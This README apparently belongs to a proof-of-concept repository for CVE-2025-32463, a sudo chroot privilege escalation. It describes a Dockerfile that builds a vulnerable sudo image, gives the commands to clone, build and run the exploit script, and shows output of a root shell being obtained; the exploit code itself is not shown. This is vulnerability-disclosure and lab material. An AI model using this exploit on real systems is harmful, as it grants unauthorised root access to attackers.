
Escalada de privilégio para o root através do binário sudo com a opção chroot. CVE-2025-32463
Este repositório fornece um ambiente mínimo e reproduzível para demonstrar a falha de escalada de privilégios CVE‑2025‑32463 no recurso chroot do sudo.
As compilações vulneráveis do sudo 1.9.14 até 1.9.17 (todas as p‑revisions) na maioria das distribuições Linux são afetadas.
Páginas de Segurança
| Arquivo | Propósito |
|---|---|
| Dockerfile | Constrói uma imagem Ubuntu 24.04 com sudo 1.9.16p2 vulnerável e ferramentas de compilação |
| sudo‑chwoot.sh | Exploit de prova de conceito que gera um shell root dentro do chroot |
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
O run.sh passa --privileged e --rm para o Docker para que o contêiner se limpe ao sair.
Remova a imagem quando terminar:
docker rmi sudo-chwoot
| Script auxiliar que constrói a imagem (se necessário) e inicia o contêiner do exploit |